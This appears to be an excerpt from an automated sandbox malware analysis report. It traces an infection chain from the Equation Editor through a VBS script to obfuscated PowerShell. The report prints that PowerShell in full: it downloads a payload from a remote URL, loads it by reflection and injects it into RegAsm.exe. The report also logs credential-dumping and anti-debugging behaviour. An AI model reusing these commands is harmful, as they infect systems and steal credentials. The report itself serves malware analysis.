                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 946 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3836Thread sleep count: 266 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3836Thread sleep time: -133000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3840Thread sleep count: 109 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3840Thread sleep time: -327000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3896Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3840Thread sleep count: 9333 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3840Thread sleep time: -27999000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4016Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4084Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00443355 mov eax, dword ptr fs:[00000030h]9_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10004AB4 mov eax, dword ptr fs:[00000030h]9_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,9_2_00411D39
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434BD8 SetUnhandledExceptionFilter,9_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10002B1C

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,9_2_0041812A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419662 mouse_event,9_2_00419662
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ftrhfuxf"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\inwrfmihsqs"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezj9jysndxinkydsjysnid0geycrjzf9ahqnkyd0cccrj3m6ly9yyscrj3cuz2knkyd0accrj3vidxnlcmnvbnrlbnquy29tl04nkydvrgv0zwmnkyd0jysnt24vtm9ezxqnkydly3rpjysnbicrjy8nkydyzwzzjysnl2hlywqnkydzl21haw4vjysnrgv0jysnywhob3qnkydojysnlscrj1yudhh0ezenkyd9oyankyd7mn0nkydiyxnlnicrjzrdb250jysnzw50iccrjz0nkycgke4nkydljysndy0nkydpymonkydly3qgu3lzdccrj2unkydtlk4nkydldc4nkydxzscrj2jdbgknkydljysnbnqnkycplicrj0rvjysnd24nkydsb2enkydku3qnkydyjysnascrj25nkccrj3syfxunkydybck7ihsyfwjpbmenkydyeunvbnrlbicrj3qgjysnpsbbjysnuycrj3lzdgvtjysnlknvbnynkydlcnrdojpgjysncicrj28nkydtjysnqmfzzty0u3ryascrj25njysnkhsyfwjhcycrj2u2nccrj0nvbnrljysnbnqpoycrjyankyd7micrj30nkydhjysnc3nlbwinkydsjysnescrjya9jysniftszwzsjysnzscrj2n0jysnascrj28nkydulkfzc2vtjysnyicrj2x5xscrjzo6tg9hjysnzch7jysnmn1ijysnaw5hcnldbycrj24nkyd0zw50jysnktsgw2rubgknkydilicrj0lpjysnlkhvjysnbwvdjysnojpwqukoezb9dhh0lkunkyddjysnq05olza0jysnmi83ndeumdmnkycxlicrjzi3ms43jysnmdevlycrjzpwdhrojysnezb9jysnlcb7jysnmh1kjysnzxmnkydhdgknkyd2jysnywrvjysnezb9jysnlcb7jysnmh1kzxnhdgknkyd2ywrvezb9lcb7jysnmh1kzxnhjysndgknkyd2ywqnkydvjysnezb9lcb7jysnmh1sjysnzscrj2cnkydbjysnc217mh0sihswfxswfswnkyd7mh17mh0pjyktzltjagfyxtm0lftjagfyxtm5lftjagfyxtm2ksb8liaoicrqc0hptwvbmjfdkyrqu0hptwvbmzbdkydyjyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/n'+'odetec'+'t'+'on/nodet'+'ecto'+'n'+'/'+'refs'+'/head'+'s/main/'+'det'+'ahnot'+'h'+'-'+'v.txt{1'+'}; '+'{2}'+'base6'+'4cont'+'ent '+'='+' (n'+'e'+'w-'+'obj'+'ect syst'+'e'+'m.n'+'et.'+'we'+'bcli'+'e'+'nt'+').'+'do'+'wn'+'loa'+'dst'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryconten'+'t '+'= ['+'s'+'ystem'+'.conv'+'ert]::f'+'r'+'o'+'m'+'base64stri'+'ng'+'({2}bas'+'e64'+'conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [refl'+'e'+'ct'+'i'+'o'+'n.assem'+'b'+'ly]'+'::loa'+'d({'+'2}b'+'inaryco'+'n'+'tent'+'); [dnli'+'b.'+'io'+'.ho'+'me]'+'::vai({0}txt.e'+'c'+'cnn/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}r'+'e'+'g'+'a'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $pshome[21]+$pshome[30]+'x')"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezj9jysndxinkydsjysnid0geycrjzf9ahqnkyd0cccrj3m6ly9yyscrj3cuz2knkyd0accrj3vidxnlcmnvbnrlbnquy29tl04nkydvrgv0zwmnkyd0jysnt24vtm9ezxqnkydly3rpjysnbicrjy8nkydyzwzzjysnl2hlywqnkydzl21haw4vjysnrgv0jysnywhob3qnkydojysnlscrj1yudhh0ezenkyd9oyankyd7mn0nkydiyxnlnicrjzrdb250jysnzw50iccrjz0nkycgke4nkydljysndy0nkydpymonkydly3qgu3lzdccrj2unkydtlk4nkydldc4nkydxzscrj2jdbgknkydljysnbnqnkycplicrj0rvjysnd24nkydsb2enkydku3qnkydyjysnascrj25nkccrj3syfxunkydybck7ihsyfwjpbmenkydyeunvbnrlbicrj3qgjysnpsbbjysnuycrj3lzdgvtjysnlknvbnynkydlcnrdojpgjysncicrj28nkydtjysnqmfzzty0u3ryascrj25njysnkhsyfwjhcycrj2u2nccrj0nvbnrljysnbnqpoycrjyankyd7micrj30nkydhjysnc3nlbwinkydsjysnescrjya9jysniftszwzsjysnzscrj2n0jysnascrj28nkydulkfzc2vtjysnyicrj2x5xscrjzo6tg9hjysnzch7jysnmn1ijysnaw5hcnldbycrj24nkyd0zw50jysnktsgw2rubgknkydilicrj0lpjysnlkhvjysnbwvdjysnojpwqukoezb9dhh0lkunkyddjysnq05olza0jysnmi83ndeumdmnkycxlicrjzi3ms43jysnmdevlycrjzpwdhrojysnezb9jysnlcb7jysnmh1kjysnzxmnkydhdgknkyd2jysnywrvjysnezb9jysnlcb7jysnmh1kzxnhdgknkyd2ywrvezb9lcb7jysnmh1kzxnhjysndgknkyd2ywqnkydvjysnezb9lcb7jysnmh1sjysnzscrj2cnkydbjysnc217mh0sihswfxswfswnkyd7mh17mh0pjyktzltjagfyxtm0lftjagfyxtm5lftjagfyxtm2ksb8liaoicrqc0hptwvbmjfdkyrqu0hptwvbmzbdkydyjyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
